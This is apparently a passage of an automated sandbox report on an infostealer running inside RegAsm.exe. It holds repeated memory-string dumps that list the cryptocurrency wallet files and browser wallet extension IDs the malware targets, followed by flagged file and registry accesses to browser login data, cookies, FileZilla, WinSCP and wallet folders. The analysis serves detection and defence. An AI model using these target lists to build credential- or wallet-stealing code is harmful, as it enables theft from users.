Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\
Source: RegAsm.exe, 00000002.00000002.2120226733.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: MetaMask\|1\|nkbihfbeogaeaoehlefnkodbefgpgknn\|1\|0\|0\|MetaMask\|1\|djclckkglechooblngghdinmeemkbgci\|1\|0\|0\|MetaMask\|1\|ejbalbakoplchlghecdalmeeeajnimhm\|1\|0\|0\|TronLink\|1\|ibnejdfjmmkpcnlpebklmnkoeoihofec\|1\|0\|0\|BinanceChainWallet\|1\|fhbohimaelbohpjbbldcngcnapndodjp\|1\|1\|0\|Yoroi\|1\|ffnbelfdoeiohenkjibnmadjiehjhajb\|1\|0\|0\|Coinbase\|1\|hnfanknocfeofbddgcijnmhnfnkdnaad\|1\|0\|1\|Guarda\|1\|hpglfhgfnhbgpjdenjgmdgoeiappafln\|1\|0\|1\|iWallet\|1\|kncchdigobghenbbaddojjnnaogfppfj\|1\|0\|0\|RoninWallet\|1\|fnjhmkhhmkbjkkabndcnnogagogbneec\|1\|0\|0\|NeoLine\|1\|cphhlgmgameodnhkjdmkpanlelnlohao\|1\|0\|0\|CloverWallet\|1\|nhnkbkgjikgcigadomkphalanndcapjk\|1\|0\|0\|LiqualityWallet\|1\|kpfopkelmapcoipemfendmdcghnegimn\|1\|0\|0\|Terra_Station\|1\|aiifbnbfobpmeekipheeijimdpnlpgpp\|1\|0\|0\|Keplr\|1\|dmkamcknogkgcdfhhbddcghachkejeap\|1\|0\|0\|AuroWallet\|1\|cnmamaachppnkjgnildpdmkaakejnhae\|1\|0\|0\|PolymeshWallet\|1\|jojhfeoedkpkglbfimdfabpdfjaoolaf\|1\|0\|0\|ICONex\|1\|flpiciilemghbmfalicajoolhkkenfel\|1\|0\|0\|Coin98\|1\|aeachknmefphepccionboohckonoeemg\|1\|0\|0\|EVER Wallet\|1\|cgeeodpfagjceefieflmdfphplkenlfk\|1\|0\|0\|KardiaChain\|1\|pdadjkfkgcafgbceimcpbkalnfnepbnk\|1\|0\|0\|Rabby\|1\|acmacodkjbdgmoleebolmdjonilkdbch\|1\|0\|0\|Phantom\|1\|bfnaelmomeimhlpmgjnjophhpkkoljpa\|1\|0\|0\|Oxygen (Atomic)\|1\|fhilaheimglignddkjgofkcbgekhenbh\|1\|0\|0\|PaliWallet\|1\|mgffkfbidihjpoaomajlbgchddlicgpn\|1\|0\|0\|NamiWallet\|1\|lpfcbjknijpeeillifnkikgncikgfhdo\|1\|0\|0\|Solflare\|1\|bhhhlbepdkbapadjdnnojkbgioiodbic\|1\|0\|0\|CyanoWallet\|1\|dkdedlpgdmmkkfjabffeganieamfklkm\|1\|0\|0\|KHC\|1\|hcflpincpppdclinealmandijcmnkbgn\|1\|0\|0\|TezBox\|1\|mnfifefkajgofkcjkemidiaecocnkjeh\|1\|0\|0\|Goby\|1\|jnkelfanjkeadonecabehalmbgpfodjm\|1\|0\|0\|RoninWalletEdge\|1\|kjmoohlgokccodicjjfebfomlbljgfhk\|1\|0\|0\|UniSat Wallet\|1\|ppbibelpcjmhbdihakflkdcoccbgbkpo\|1\|0\|0\|Authenticator\|0\|bhghoamapcdpbohphigoooaddinpkbai\|1\|1\|0\|GAuth Authenticator\|0\|ilgcnhelpchnceeipipijaljkblbcobl\|1\|1\|1\|Tronium\|1\|pnndplcbkakcplkjnolgbkdgjikjednm\|1\|0\|0\|Trust Wallet\|1\|egjidjbpglichdcondbcbdnbeeppgdph\|1\|0\|0\|Exodus Web3 Wallet\|1\|aholpfdialjgjfhomihkjbmgjidlcdno\|1\|0\|0\|Braavos\|1\|jnlgamecbpmbajjfhmmmlhejkemejdma\|1\|0\|0\|Enkrypt\|1\|kkpllkodjeloidieedojogacfhpaihoh\|1\|0\|0\|OKX Web3 Wallet\|1\|mcohilncbfahbmgdjkbpemcciiolgcge\|1\|0\|0\|Sender\|1\|epapihdplajcdnnkdeiahlgigofloibg\|1\|0\|0\|Hashpack\|1\|gjagmgiddbbciopjhllkdnddhcglnemk\|1\|0\|0\|GeroWallet\|1\|bgpipimickeadkjlklgciifhnalhdjhe\|1\|0\|0\|Pontem Wallet\|1\|phkbamefinggmakgklpkljjmgibohnba\|1\|0\|0\|Finnie\|1\|cjmkndjhnagcfbpiemnkdpomccnjblmj\|1\|0\|0\|Leap Terra\|1\|aijcbedoijmgnlmjeegjaglmepbmpkpi\|1\|0\|0\|Microsoft AutoFill\|0\|fiedbfgcleddlbcmgdigjgdfcggjcion\|1\|0\|0\|Bitwarden\|0\|nngceckbapebfimnlniiiahkandclblb\|1\|0\|0\|KeePass Tusk\|0\|fmhmiaejopepamlcjkncpgpdjichnecm\|1\|0\|0\|KeePassXC-Browser\|0\|oboonakemofpalcgghocfoadofidjkkk\|1\|0\|0\|Rise - Aptos Wallet\|1\|hbbgbephgojikajhfbomhlmmollphcad\|1\|0\|0\|Rainbow Wallet\|1\|opfgelmcmbiajamepnmloijbpoleiama\|1\|0\|0\|Nightly\|1\|fiikommddbeccaoicoejoniammnalkfa\|1\|0\|0\|Ecto Wallet\|1\|bgjogpoidejdemgoochpnkmdjpocgkha\|1\|0\|0\|Coinhub\|1\|jgaaimajipbpdogpdglhaphldakikgef\|1\|0\|0\|Leap Cosmos Wallet\|1\|fcfcfllfndlomdhbehjjcoimbgofdncg\|1\|0\|0\|MultiversX DeFi Wal
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: RegAsm.exe, 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: ets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
